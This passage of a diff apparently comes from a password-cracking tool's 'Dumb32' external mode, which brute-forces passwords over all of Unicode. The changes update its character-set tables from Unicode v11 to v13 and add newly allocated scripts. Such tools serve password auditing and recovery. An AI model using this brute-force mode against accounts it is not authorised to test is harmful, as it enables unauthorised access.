while (c <= 0x8ff) // ..to ARABIC MARK SIDEWAYS NOON GHUNNA
@@ -300,7 +305,7 @@ void init()
charset[i++] = 0xb48; // ORIYA VOWEL SIGN AI
charset[i++] = 0xb4b; // ORIYA VOWEL SIGN O
charset[i++] = 0xb4d; // ORIYA SIGN VIRAMA
charset[i++] = 0xb56; // ORIYA AI LENGTH MARK
charset[i++] = 0xb55; // ORIYA SIGN OVERLINE
charset[i++] = 0xb57; // ORIYA AU LENGTH MARK
charset[i++] = 0xb5c; // ORIYA LETTER RRA
charset[i++] = 0xb5d; // ORIYA LETTER RHA
@@ -373,7 +378,7 @@ void init()
c = 0xc66; // from TELUGU DIGIT ZERO
while (c <= 0xc6f) // ..to TELUGU DIGIT NINE
charset[i++] = c++;
c = 0xc78; // from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
c = 0xc77; // from TELUGU SIGN SIDDHAM
while (c <= 0xc7f) // ..to TELUGU SIGN TUUMU
charset[i++] = c++;
// 0C80..0CFF; Kannada
@@ -411,9 +416,6 @@ void init()
charset[i++] = 0xcf2; // KANNADA SIGN UPADHMANIYA
// 0D00..0D7F; Malayalam
c = 0xd00; // from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
while (c <= 0xd03) // ..to MALAYALAM SIGN VISARGA
charset[i++] = c++;
c = 0xd05; // from MALAYALAM LETTER A
while (c <= 0xd0c) // ..to MALAYALAM LETTER VOCALIC L
charset[i++] = c++;
charset[i++] = 0xd0e; // MALAYALAM LETTER E
@@ -433,7 +435,7 @@ void init()
while (c <= 0xd7f) // ..to MALAYALAM LETTER CHILLU K
charset[i++] = c++;
// 0D80..0DFF; Sinhala
charset[i++] = 0xd82; // SINHALA SIGN ANUSVARAYA
charset[i++] = 0xd81; // SINHALA SIGN CANDRABINDU
charset[i++] = 0xd83; // SINHALA SIGN VISARGAYA
c = 0xd85; // from SINHALA LETTER AYANNA
while (c <= 0xd96) // ..to SINHALA LETTER AUYANNA
@@ -468,23 +470,15 @@ void init()
// 0E80..0EFF; Lao
charset[i++] = 0xe81; // LAO LETTER KO
charset[i++] = 0xe82; // LAO LETTER KHO SUNG
charset[i++] = 0xe87; // LAO LETTER NGO
charset[i++] = 0xe88; // LAO LETTER CO
c = 0xe94; // from LAO LETTER DO
while (c <= 0xe97) // ..to LAO LETTER THO TAM
c = 0xe86; // from LAO LETTER PALI GHA
while (c <= 0xe8a) // ..to LAO LETTER SO TAM
charset[i++] = c++;
c = 0xe99; // from LAO LETTER NO
while (c <= 0xe9f) // ..to LAO LETTER FO SUNG
c = 0xe8c; // from LAO LETTER PALI JHA
while (c <= 0xea3) // ..to LAO LETTER LO LING
charset[i++] = c++;
charset[i++] = 0xea1; // LAO LETTER MO
charset[i++] = 0xea3; // LAO LETTER LO LING
charset[i++] = 0xeaa; // LAO LETTER SO SUNG
charset[i++] = 0xeab; // LAO LETTER HO SUNG
c = 0xead; // from LAO LETTER O
while (c <= 0xeb9) // ..to LAO VOWEL SIGN UU
c = 0xea7; // from LAO LETTER WO
while (c <= 0xebd) // ..to LAO SEMIVOWEL SIGN NYO
charset[i++] = c++;
charset[i++] = 0xebb; // LAO VOWEL SIGN MAI KON
charset[i++] = 0xebd; // LAO SEMIVOWEL SIGN NYO
c = 0xec0; // from LAO VOWEL SIGN E
while (c <= 0xec4) // ..to LAO VOWEL SIGN AI
charset[i++] = c++;
@@ -710,7 +704,7 @@ void init()
charset[i++] = c++;
// 1AB0..1AFF; Combining Diacritical Marks Extended
c = 0x1ab0; // from COMBINING DOUBLED CIRCUMFLEX ACCENT
while (c <= 0x1abe) // ..to COMBINING PARENTHESES OVERLAY
while (c <= 0x1ac0) // ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
charset[i++] = c++;
// 1B00..1B7F; Balinese
c = 0x1b00; // from BALINESE SIGN ULU RICEM
@@ -759,7 +753,7 @@ void init()
charset[i++] = c++;
// 1CD0..1CFF; Vedic Extensions
c = 0x1cd0; // from VEDIC TONE KARSHANA
while (c <= 0x1cf9) // ..to VEDIC TONE DOUBLE RING ABOVE
while (c <= 0x1cfa) // ..to VEDIC SIGN DOUBLE ANUSVARA ANTARGOMUKHA
charset[i++] = c++;
// 1D00..1D7F; Phonetic Extensions
c = 0x1d00; // from LATIN LETTER SMALL CAPITAL A
@@ -926,11 +920,8 @@ void init()
c = 0x2b76; // from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
while (c <= 0x2b95) // ..to RIGHTWARDS BLACK ARROW
charset[i++] = c++;
c = 0x2b98; // from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
while (c <= 0x2bc8) // ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
charset[i++] = c++;
c = 0x2bca; // from TOP HALF BLACK CIRCLE
while (c <= 0x2bfe) // ..to REVERSED RIGHT ANGLE
c = 0x2b97; // from SYMBOL FOR TYPE A ELECTRONICS
while (c <= 0x2bff) // ..to HELLSCHREIBER PAUSE SYMBOL
charset[i++] = c++;
// 2C00..2C5F; Glagolitic
c = 0x2c00; // from GLAGOLITIC CAPITAL LETTER AZU
@@ -998,7 +989,7 @@ void init()
charset[i++] = c++;
// 2E00..2E7F; Supplemental Punctuation
c = 0x2e00; // from RIGHT ANGLE SUBSTITUTION MARKER
while (c <= 0x2e4e) // ..to PUNCTUS ELEVATUS MARK
while (c <= 0x2e52) // ..to TIRONIAN SIGN CAPITAL ET
charset[i++] = c++;
// 2E80..2EFF; CJK Radicals Supplement
c = 0x2e80; // from CJK RADICAL REPEAT
@@ -1044,7 +1035,7 @@ void init()
charset[i++] = c++;
// 31A0..31BF; Bopomofo Extended
c = 0x31a0; // from BOPOMOFO LETTER BU
while (c <= 0x31ba) // ..to BOPOMOFO LETTER ZY
while (c <= 0x31bf) // ..to BOPOMOFO LETTER AH
charset[i++] = c++;
// 31C0..31EF; CJK Strokes
c = 0x31c0; // from CJK STROKE T
@@ -1059,7 +1050,7 @@ void init()
while (c <= 0x321e) // ..to PARENTHESIZED KOREAN CHARACTER O HU
charset[i++] = c++;
c = 0x3220; // from PARENTHESIZED IDEOGRAPH ONE
while (c <= 0x32fe) // ..to CIRCLED KATAKANA WO
while (c <= 0x32ff) // ..to SQUARE ERA NAME REIWA
charset[i++] = c++;
// 3300..33FF; CJK Compatibility
c = 0x3300; // from SQUARE APAATO
@@ -1067,7 +1058,7 @@ void init()
charset[i++] = c++;
// 3400..4DBF; CJK Unified Ideographs Extension A
c = 0x3400; // from <CJK Ideograph Extension A, First>
while (c <= 0x4db5) // ..to <CJK Ideograph Extension A, Last>
while (c <= 0x4dbf) // ..to <CJK Ideograph Extension A, Last>
charset[i++] = c++;
// 4DC0..4DFF; Yijing Hexagram Symbols
c = 0x4dc0; // from HEXAGRAM FOR THE CREATIVE HEAVEN
@@ -1075,7 +1066,7 @@ void init()
charset[i++] = c++;
// 4E00..9FFF; CJK Unified Ideographs
c = 0x4e00; // from <CJK Ideograph, First>
while (c <= 0x9fef) // ..to <CJK Ideograph, Last>
while (c <= 0x9ffc) // ..to <CJK Ideograph, Last>
charset[i++] = c++;
// A000..A48F; Yi Syllables
c = 0xa000; // from YI SYLLABLE IT
@@ -1107,14 +1098,17 @@ void init()
charset[i++] = c++;
// A720..A7FF; Latin Extended-D
c = 0xa720; // from MODIFIER LETTER STRESS AND HIGH TONE
while (c <= 0xa7b9) // ..to LATIN SMALL LETTER U WITH STROKE
while (c <= 0xa7bf) // ..to LATIN SMALL LETTER GLOTTAL U
charset[i++] = c++;
c = 0xa7f7; // from LATIN EPIGRAPHIC LETTER SIDEWAYS I
c = 0xa7c2; // from LATIN CAPITAL LETTER ANGLICANA W
while (c <= 0xa7ca) // ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
charset[i++] = c++;
c = 0xa7f5; // from LATIN CAPITAL LETTER REVERSED HALF H
while (c <= 0xa7ff) // ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
charset[i++] = c++;
// A800..A82F; Syloti Nagri
c = 0xa800; // from SYLOTI NAGRI LETTER A
while (c <= 0xa82b) // ..to SYLOTI NAGRI POETRY MARK-4
while (c <= 0xa82c) // ..to SYLOTI NAGRI SIGN ALTERNATE HASANTA
charset[i++] = c++;
// A830..A83F; Common Indic Number Forms
c = 0xa830; // from NORTH INDIC FRACTION ONE QUARTER
@@ -1207,7 +1201,7 @@ void init()
charset[i++] = c++;
// AB30..AB6F; Latin Extended-E
c = 0xab30; // from LATIN SMALL LETTER BARRED ALPHA
while (c <= 0xab65) // ..to GREEK LETTER SMALL CAPITAL OMEGA
while (c <= 0xab6b) // ..to MODIFIER LETTER RIGHT TACK
charset[i++] = c++;
// AB70..ABBF; Cherokee Supplement
c = 0xab70; // from CHEROKEE SMALL LETTER A
+195 -89
View File
@@ -1,11 +1,11 @@
# This software is Copyright (c) 2012-2018 magnum, and it is hereby
# This software is Copyright (c) 2012-2020 magnum, and it is hereby
# released to the general public under the following terms:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# Generic implementation of "dumb" exhaustive search of FULL Unicode.
# Default is to try *all* allocated characters in Unicode v11 (there's
# 137,046 of them). Even if a fast format can exhaust two characters in one
# Default is to try *all* allocated characters in Unicode v13 (there's
# 143,532 of them). Even if a fast format can exhaust two characters in one
# hour, three characters would take 12 years...
#
# Note that these modes will handle --max-len differently than normal: They
@@ -17,12 +17,17 @@
# format will be up to four bytes (two 16-bit words) due to use of surrogates
# for characters above U+FFFF. This means a format which normally handles up
# to 27 characters may be limited to only 13 characters, worst case.
#
# Note that the (newer) cracking mode --subsets=full-unicode is way faster than
# this external mode, although not as easy to adapt to smaller portions of the
# Unicode space. See doc/SUBSETS
[List.External:Dumb32]
int maxlength; // Maximum password length to try
int last; // Last character position, zero-based
int lastid; // Character index in the last position
int id[0x7f]; // Current character indices for other positions
int charset[0x22000], c0; // Characters
int charset[0x24000], c0; // Characters
void init()
{
@@ -168,7 +173,7 @@ void init()
while (c <= 0x8b4) // ..to ARABIC LETTER KAF WITH DOT BELOW
charset[i++] = c++;
c = 0x8b6; // from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
while (c <= 0x8bd) // ..to ARABIC LETTER AFRICAN NOON
while (c <= 0x8c7) // ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
charset[i++] = c++;
c = 0x8d3; // from ARABIC SMALL LOW WAW
while (c <= 0x8ff) // ..to ARABIC MARK SIDEWAYS NOON GHUNNA
@@ -305,7 +310,7 @@ void init()
charset[i++] = 0xb48; // ORIYA VOWEL SIGN AI
charset[i++] = 0xb4b; // ORIYA VOWEL SIGN O
charset[i++] = 0xb4d; // ORIYA SIGN VIRAMA
charset[i++] = 0xb56; // ORIYA AI LENGTH MARK
charset[i++] = 0xb55; // ORIYA SIGN OVERLINE
charset[i++] = 0xb57; // ORIYA AU LENGTH MARK
charset[i++] = 0xb5c; // ORIYA LETTER RRA
charset[i++] = 0xb5d; // ORIYA LETTER RHA
@@ -378,7 +383,7 @@ void init()
c = 0xc66; // from TELUGU DIGIT ZERO
while (c <= 0xc6f) // ..to TELUGU DIGIT NINE
charset[i++] = c++;
c = 0xc78; // from TELUGU FRACTION DIGIT ZERO FOR ODD POWERS OF FOUR
c = 0xc77; // from TELUGU SIGN SIDDHAM
while (c <= 0xc7f) // ..to TELUGU SIGN TUUMU
charset[i++] = c++;
// 0C80..0CFF; Kannada
@@ -416,9 +421,6 @@ void init()
charset[i++] = 0xcf2; // KANNADA SIGN UPADHMANIYA
// 0D00..0D7F; Malayalam
c = 0xd00; // from MALAYALAM SIGN COMBINING ANUSVARA ABOVE
while (c <= 0xd03) // ..to MALAYALAM SIGN VISARGA
charset[i++] = c++;
c = 0xd05; // from MALAYALAM LETTER A
while (c <= 0xd0c) // ..to MALAYALAM LETTER VOCALIC L
charset[i++] = c++;
charset[i++] = 0xd0e; // MALAYALAM LETTER E
@@ -438,7 +440,7 @@ void init()
while (c <= 0xd7f) // ..to MALAYALAM LETTER CHILLU K
charset[i++] = c++;
// 0D80..0DFF; Sinhala
charset[i++] = 0xd82; // SINHALA SIGN ANUSVARAYA
charset[i++] = 0xd81; // SINHALA SIGN CANDRABINDU
charset[i++] = 0xd83; // SINHALA SIGN VISARGAYA
c = 0xd85; // from SINHALA LETTER AYANNA
while (c <= 0xd96) // ..to SINHALA LETTER AUYANNA
@@ -473,23 +475,15 @@ void init()
// 0E80..0EFF; Lao
charset[i++] = 0xe81; // LAO LETTER KO
charset[i++] = 0xe82; // LAO LETTER KHO SUNG
charset[i++] = 0xe87; // LAO LETTER NGO
charset[i++] = 0xe88; // LAO LETTER CO
c = 0xe94; // from LAO LETTER DO
while (c <= 0xe97) // ..to LAO LETTER THO TAM
c = 0xe86; // from LAO LETTER PALI GHA
while (c <= 0xe8a) // ..to LAO LETTER SO TAM
charset[i++] = c++;
c = 0xe99; // from LAO LETTER NO
while (c <= 0xe9f) // ..to LAO LETTER FO SUNG
c = 0xe8c; // from LAO LETTER PALI JHA
while (c <= 0xea3) // ..to LAO LETTER LO LING
charset[i++] = c++;
charset[i++] = 0xea1; // LAO LETTER MO
charset[i++] = 0xea3; // LAO LETTER LO LING
charset[i++] = 0xeaa; // LAO LETTER SO SUNG
charset[i++] = 0xeab; // LAO LETTER HO SUNG
c = 0xead; // from LAO LETTER O
while (c <= 0xeb9) // ..to LAO VOWEL SIGN UU
c = 0xea7; // from LAO LETTER WO
while (c <= 0xebd) // ..to LAO SEMIVOWEL SIGN NYO
charset[i++] = c++;
charset[i++] = 0xebb; // LAO VOWEL SIGN MAI KON
charset[i++] = 0xebd; // LAO SEMIVOWEL SIGN NYO
c = 0xec0; // from LAO VOWEL SIGN E
while (c <= 0xec4) // ..to LAO VOWEL SIGN AI
charset[i++] = c++;
@@ -715,7 +709,7 @@ void init()
charset[i++] = c++;
// 1AB0..1AFF; Combining Diacritical Marks Extended
c = 0x1ab0; // from COMBINING DOUBLED CIRCUMFLEX ACCENT
while (c <= 0x1abe) // ..to COMBINING PARENTHESES OVERLAY
while (c <= 0x1ac0) // ..to COMBINING LATIN SMALL LETTER TURNED W BELOW
charset[i++] = c++;
// 1B00..1B7F; Balinese
c = 0x1b00; // from BALINESE SIGN ULU RICEM
@@ -764,7 +758,7 @@ void init()
charset[i++] = c++;
// 1CD0..1CFF; Vedic Extensions
c = 0x1cd0; // from VEDIC TONE KARSHANA
while (c <= 0x1cf9) // ..to VEDIC TONE DOUBLE RING ABOVE
while (c <= 0x1cfa) // ..to VEDIC SIGN DOUBLE ANUSVARA ANTARGOMUKHA
charset[i++] = c++;
// 1D00..1D7F; Phonetic Extensions
c = 0x1d00; // from LATIN LETTER SMALL CAPITAL A
@@ -931,11 +925,8 @@ void init()
c = 0x2b76; // from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
while (c <= 0x2b95) // ..to RIGHTWARDS BLACK ARROW
charset[i++] = c++;
c = 0x2b98; // from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
while (c <= 0x2bc8) // ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
charset[i++] = c++;
c = 0x2bca; // from TOP HALF BLACK CIRCLE
while (c <= 0x2bfe) // ..to REVERSED RIGHT ANGLE
c = 0x2b97; // from SYMBOL FOR TYPE A ELECTRONICS
while (c <= 0x2bff) // ..to HELLSCHREIBER PAUSE SYMBOL
charset[i++] = c++;
// 2C00..2C5F; Glagolitic
c = 0x2c00; // from GLAGOLITIC CAPITAL LETTER AZU
@@ -1003,7 +994,7 @@ void init()
charset[i++] = c++;
// 2E00..2E7F; Supplemental Punctuation
c = 0x2e00; // from RIGHT ANGLE SUBSTITUTION MARKER
while (c <= 0x2e4e) // ..to PUNCTUS ELEVATUS MARK
while (c <= 0x2e52) // ..to TIRONIAN SIGN CAPITAL ET
charset[i++] = c++;
// 2E80..2EFF; CJK Radicals Supplement
c = 0x2e80; // from CJK RADICAL REPEAT
@@ -1049,7 +1040,7 @@ void init()
charset[i++] = c++;
// 31A0..31BF; Bopomofo Extended
c = 0x31a0; // from BOPOMOFO LETTER BU
while (c <= 0x31ba) // ..to BOPOMOFO LETTER ZY
while (c <= 0x31bf) // ..to BOPOMOFO LETTER AH
charset[i++] = c++;
// 31C0..31EF; CJK Strokes
c = 0x31c0; // from CJK STROKE T
@@ -1064,7 +1055,7 @@ void init()
while (c <= 0x321e) // ..to PARENTHESIZED KOREAN CHARACTER O HU
charset[i++] = c++;
c = 0x3220; // from PARENTHESIZED IDEOGRAPH ONE
while (c <= 0x32fe) // ..to CIRCLED KATAKANA WO
while (c <= 0x32ff) // ..to SQUARE ERA NAME REIWA
charset[i++] = c++;
// 3300..33FF; CJK Compatibility
c = 0x3300; // from SQUARE APAATO
@@ -1072,7 +1063,7 @@ void init()
charset[i++] = c++;
// 3400..4DBF; CJK Unified Ideographs Extension A
c = 0x3400; // from <CJK Ideograph Extension A, First>
while (c <= 0x4db5) // ..to <CJK Ideograph Extension A, Last>
while (c <= 0x4dbf) // ..to <CJK Ideograph Extension A, Last>
charset[i++] = c++;
// 4DC0..4DFF; Yijing Hexagram Symbols
c = 0x4dc0; // from HEXAGRAM FOR THE CREATIVE HEAVEN
@@ -1080,7 +1071,7 @@ void init()
charset[i++] = c++;
// 4E00..9FFF; CJK Unified Ideographs
c = 0x4e00; // from <CJK Ideograph, First>
while (c <= 0x9fef) // ..to <CJK Ideograph, Last>
while (c <= 0x9ffc) // ..to <CJK Ideograph, Last>
charset[i++] = c++;
// A000..A48F; Yi Syllables
c = 0xa000; // from YI SYLLABLE IT
@@ -1112,14 +1103,17 @@ void init()
charset[i++] = c++;
// A720..A7FF; Latin Extended-D
c = 0xa720; // from MODIFIER LETTER STRESS AND HIGH TONE
while (c <= 0xa7b9) // ..to LATIN SMALL LETTER U WITH STROKE
while (c <= 0xa7bf) // ..to LATIN SMALL LETTER GLOTTAL U
charset[i++] = c++;
c = 0xa7f7; // from LATIN EPIGRAPHIC LETTER SIDEWAYS I
c = 0xa7c2; // from LATIN CAPITAL LETTER ANGLICANA W
while (c <= 0xa7ca) // ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
charset[i++] = c++;
c = 0xa7f5; // from LATIN CAPITAL LETTER REVERSED HALF H
while (c <= 0xa7ff) // ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
charset[i++] = c++;
// A800..A82F; Syloti Nagri
c = 0xa800; // from SYLOTI NAGRI LETTER A
while (c <= 0xa82b) // ..to SYLOTI NAGRI POETRY MARK-4
while (c <= 0xa82c) // ..to SYLOTI NAGRI SIGN ALTERNATE HASANTA
charset[i++] = c++;
// A830..A83F; Common Indic Number Forms
c = 0xa830; // from NORTH INDIC FRACTION ONE QUARTER
@@ -1212,7 +1206,7 @@ void init()
charset[i++] = c++;
// AB30..AB6F; Latin Extended-E
c = 0xab30; // from LATIN SMALL LETTER BARRED ALPHA
while (c <= 0xab65) // ..to GREEK LETTER SMALL CAPITAL OMEGA
while (c <= 0xab6b) // ..to MODIFIER LETTER RIGHT TACK
charset[i++] = c++;
// AB70..ABBF; Cherokee Supplement
c = 0xab70; // from CHEROKEE SMALL LETTER A
@@ -1378,7 +1372,7 @@ void init()
charset[i++] = c++;
// 10190..101CF; Ancient Symbols
c = 0x10190; // from ROMAN SEXTANS SIGN
while (c <= 0x1019b) // ..to ROMAN CENTURIAL SIGN
while (c <= 0x1019c) // ..to ASCIA SYMBOL
charset[i++] = c++;
charset[i++] = 0x101a0; // GREEK SYMBOL TAU RHO
// 101D0..101FF; Phaistos Disc
@@ -1620,6 +1614,14 @@ void init()
c = 0x10e60; // from RUMI DIGIT ONE
while (c <= 0x10e7e) // ..to RUMI FRACTION TWO THIRDS
charset[i++] = c++;
// 10E80..10EBF; Yezidi
c = 0x10e80; // from YEZIDI LETTER ELIF
while (c <= 0x10ea9) // ..to YEZIDI LETTER ET
charset[i++] = c++;
charset[i++] = 0x10eab; // YEZIDI COMBINING HAMZA MARK
charset[i++] = 0x10ead; // YEZIDI HYPHENATION MARK
charset[i++] = 0x10eb0; // YEZIDI LETTER LAM WITH DOT ABOVE
charset[i++] = 0x10eb1; // YEZIDI LETTER YOT WITH CIRCUMFLEX ABOVE
// 10F00..10F2F; Old Sogdian
c = 0x10f00; // from OLD SOGDIAN LETTER ALEPH
while (c <= 0x10f27) // ..to OLD SOGDIAN LIGATURE AYIN-DALETH
@@ -1628,6 +1630,14 @@ void init()
c = 0x10f30; // from SOGDIAN LETTER ALEPH
while (c <= 0x10f59) // ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
charset[i++] = c++;
// 10FB0..10FDF; Chorasmian
c = 0x10fb0; // from CHORASMIAN LETTER ALEPH
while (c <= 0x10fcb) // ..to CHORASMIAN NUMBER ONE HUNDRED
charset[i++] = c++;
// 10FE0..10FFF; Elymaic
c = 0x10fe0; // from ELYMAIC LETTER ALEPH
while (c <= 0x10ff6) // ..to ELYMAIC LIGATURE ZAYIN-YODH
charset[i++] = c++;
// 11000..1107F; Brahmi
c = 0x11000; // from BRAHMI SIGN CANDRABINDU
while (c <= 0x1104d) // ..to BRAHMI PUNCTUATION LOTUS
@@ -1653,7 +1663,7 @@ void init()
while (c <= 0x11134) // ..to CHAKMA MAAYYAA
charset[i++] = c++;
c = 0x11136; // from CHAKMA DIGIT ZERO
while (c <= 0x11146) // ..to CHAKMA VOWEL SIGN EI
while (c <= 0x11147) // ..to CHAKMA LETTER VAA
charset[i++] = c++;
// 11150..1117F; Mahajani
c = 0x11150; // from MAHAJANI LETTER A
@@ -1661,9 +1671,6 @@ void init()
charset[i++] = c++;
// 11180..111DF; Sharada
c = 0x11180; // from SHARADA SIGN CANDRABINDU
while (c <= 0x111cd) // ..to SHARADA SUTRA MARK
charset[i++] = c++;
c = 0x111d0; // from SHARADA DIGIT ZERO
while (c <= 0x111df) // ..to SHARADA SECTION MARK-2
charset[i++] = c++;
// 111E0..111FF; Sinhala Archaic Numbers
@@ -1735,10 +1742,11 @@ void init()
charset[i++] = c++;
// 11400..1147F; Newa
c = 0x11400; // from NEWA LETTER A
while (c <= 0x11459) // ..to NEWA DIGIT NINE
while (c <= 0x1145b) // ..to NEWA PLACEHOLDER MARK
charset[i++] = c++;
c = 0x1145d; // from NEWA INSERTION SIGN
while (c <= 0x11461) // ..to NEWA SIGN UPADHMANIYA
charset[i++] = c++;
charset[i++] = 0x1145d; // NEWA INSERTION SIGN
charset[i++] = 0x1145e; // NEWA SANDHI MARK
// 11480..114DF; Tirhuta
c = 0x11480; // from TIRHUTA ANJI
while (c <= 0x114c7) // ..to TIRHUTA OM
@@ -1766,7 +1774,7 @@ void init()
charset[i++] = c++;
// 11680..116CF; Takri
c = 0x11680; // from TAKRI LETTER A
while (c <= 0x116b7) // ..to TAKRI SIGN NUKTA
while (c <= 0x116b8) // ..to TAKRI LETTER ARCHAIC KHA
charset[i++] = c++;
c = 0x116c0; // from TAKRI DIGIT ZERO
while (c <= 0x116c9) // ..to TAKRI DIGIT NINE
@@ -1790,15 +1798,42 @@ void init()
while (c <= 0x118f2) // ..to WARANG CITI NUMBER NINETY
charset[i++] = c++;
charset[i++] = 0x118ff; // WARANG CITI OM
// 11900..1195F; Dives Akuru
c = 0x11900; // from DIVES AKURU LETTER A
while (c <= 0x11906) // ..to DIVES AKURU LETTER E
charset[i++] = c++;
c = 0x1190c; // from DIVES AKURU LETTER KA
while (c <= 0x11913) // ..to DIVES AKURU LETTER JA
charset[i++] = c++;
charset[i++] = 0x11915; // DIVES AKURU LETTER NYA
charset[i++] = 0x11916; // DIVES AKURU LETTER TTA
c = 0x11918; // from DIVES AKURU LETTER DDA
while (c <= 0x11935) // ..to DIVES AKURU VOWEL SIGN E
charset[i++] = c++;
charset[i++] = 0x11937; // DIVES AKURU VOWEL SIGN AI
charset[i++] = 0x11938; // DIVES AKURU VOWEL SIGN O
c = 0x1193b; // from DIVES AKURU SIGN ANUSVARA
while (c <= 0x11946) // ..to DIVES AKURU END OF TEXT MARK
charset[i++] = c++;
c = 0x11950; // from DIVES AKURU DIGIT ZERO
while (c <= 0x11959) // ..to DIVES AKURU DIGIT NINE
charset[i++] = c++;
// 119A0..119FF; Nandinagari
c = 0x119a0; // from NANDINAGARI LETTER A
while (c <= 0x119a7) // ..to NANDINAGARI LETTER VOCALIC RR
charset[i++] = c++;
c = 0x119aa; // from NANDINAGARI LETTER E
while (c <= 0x119d7) // ..to NANDINAGARI VOWEL SIGN VOCALIC RR
charset[i++] = c++;
c = 0x119da; // from NANDINAGARI VOWEL SIGN E
while (c <= 0x119e4) // ..to NANDINAGARI VOWEL SIGN PRISHTHAMATRA E
charset[i++] = c++;
// 11A00..11A4F; Zanabazar Square
c = 0x11a00; // from ZANABAZAR SQUARE LETTER A
while (c <= 0x11a47) // ..to ZANABAZAR SQUARE SUBJOINER
charset[i++] = c++;
// 11A50..11AAF; Soyombo
c = 0x11a50; // from SOYOMBO LETTER A
while (c <= 0x11a83) // ..to SOYOMBO LETTER KSSA
charset[i++] = c++;
c = 0x11a86; // from SOYOMBO CLUSTER-INITIAL LETTER RA
while (c <= 0x11aa2) // ..to SOYOMBO TERMINAL MARK-2
charset[i++] = c++;
// 11AC0..11AFF; Pau Cin Hau
@@ -1866,6 +1901,13 @@ void init()
c = 0x11ee0; // from MAKASAR LETTER KA
while (c <= 0x11ef8) // ..to MAKASAR END OF SECTION
charset[i++] = c++;
// 11FB0..11FBF; Lisu Supplement
charset[i++] = 0x11fb0; // LISU LETTER YHA
// 11FC0..11FFF; Tamil Supplement
c = 0x11fc0; // from TAMIL FRACTION ONE THREE-HUNDRED-AND-TWENTIETH
while (c <= 0x11ff1) // ..to TAMIL SIGN VAKAIYARAA
charset[i++] = c++;
charset[i++] = 0x11fff; // TAMIL PUNCTUATION END OF TEXT
// 12000..123FF; Cuneiform
c = 0x12000; // from CUNEIFORM SIGN A
while (c <= 0x12399) // ..to CUNEIFORM SIGN U U
@@ -1885,6 +1927,10 @@ void init()
c = 0x13000; // from EGYPTIAN HIEROGLYPH A001
while (c <= 0x1342e) // ..to EGYPTIAN HIEROGLYPH AA032
charset[i++] = c++;
// 13430..1343F; Egyptian Hieroglyph Format Controls
c = 0x13430; // from EGYPTIAN HIEROGLYPH VERTICAL JOINER
while (c <= 0x13438) // ..to EGYPTIAN HIEROGLYPH END SEGMENT
charset[i++] = c++;
// 14400..1467F; Anatolian Hieroglyphs
c = 0x14400; // from ANATOLIAN HIEROGLYPH A001
while (c <= 0x14646) // ..to ANATOLIAN HIEROGLYPH A530
@@ -1931,24 +1977,35 @@ void init()
charset[i++] = c++;
// 16F00..16F9F; Miao
c = 0x16f00; // from MIAO LETTER PA
while (c <= 0x16f44) // ..to MIAO LETTER HHA
while (c <= 0x16f4a) // ..to MIAO LETTER RTE
charset[i++] = c++;
c = 0x16f50; // from MIAO LETTER NASALIZATION
while (c <= 0x16f7e) // ..to MIAO VOWEL SIGN NG
c = 0x16f4f; // from MIAO SIGN CONSONANT MODIFIER BAR
while (c <= 0x16f87) // ..to MIAO VOWEL SIGN UI
charset[i++] = c++;
c = 0x16f8f; // from MIAO TONE RIGHT
while (c <= 0x16f9f) // ..to MIAO LETTER REFORMED TONE-8
charset[i++] = c++;
// 16FE0..16FFF; Ideographic Symbols and Punctuation
charset[i++] = 0x16fe0; // TANGUT ITERATION MARK
charset[i++] = 0x16fe1; // NUSHU ITERATION MARK
c = 0x16fe0; // from TANGUT ITERATION MARK
while (c <= 0x16fe4) // ..to KHITAN SMALL SCRIPT FILLER
charset[i++] = c++;
charset[i++] = 0x16ff0; // VIETNAMESE ALTERNATE READING MARK CA
charset[i++] = 0x16ff1; // VIETNAMESE ALTERNATE READING MARK NHAY
// 17000..187FF; Tangut
c = 0x17000; // from <Tangut Ideograph, First>
while (c <= 0x187f1) // ..to <Tangut Ideograph, Last>
while (c <= 0x187f7) // ..to <Tangut Ideograph, Last>
charset[i++] = c++;
// 18800..18AFF; Tangut Components
c = 0x18800; // from TANGUT COMPONENT-001
while (c <= 0x18af2) // ..to TANGUT COMPONENT-755
while (c <= 0x18aff) // ..to TANGUT COMPONENT-768
charset[i++] = c++;
// 18B00..18CFF; Khitan Small Script
c = 0x18b00; // from KHITAN SMALL SCRIPT CHARACTER-18B00
while (c <= 0x18cd5) // ..to KHITAN SMALL SCRIPT CHARACTER-18CD5
charset[i++] = c++;
// 18D00..18D8F; Tangut Supplement
c = 0x18d00; // from <Tangut Ideograph Supplement, First>
while (c <= 0x18d08) // ..to <Tangut Ideograph Supplement, Last>
charset[i++] = c++;
// 1B000..1B0FF; Kana Supplement
c = 0x1b000; // from KATAKANA LETTER ARCHAIC E
@@ -1958,6 +2015,12 @@ void init()
c = 0x1b100; // from HENTAIGANA LETTER RE-3
while (c <= 0x1b11e) // ..to HENTAIGANA LETTER N-MU-MO-2
charset[i++] = c++;
// 1B130..1B16F; Small Kana Extension
charset[i++] = 0x1b150; // HIRAGANA LETTER SMALL WI
charset[i++] = 0x1b152; // HIRAGANA LETTER SMALL WO
c = 0x1b164; // from KATAKANA LETTER SMALL WI
while (c <= 0x1b167) // ..to KATAKANA LETTER SMALL N
charset[i++] = c++;
// 1B170..1B2FF; Nushu
c = 0x1b170; // from NUSHU CHARACTER-1B170
while (c <= 0x1b2fb) // ..to NUSHU CHARACTER-1B2FB
@@ -2087,6 +2150,23 @@ void init()
c = 0x1e026; // from COMBINING GLAGOLITIC LETTER YO
while (c <= 0x1e02a) // ..to COMBINING GLAGOLITIC LETTER FITA
charset[i++] = c++;
// 1E100..1E14F; Nyiakeng Puachue Hmong
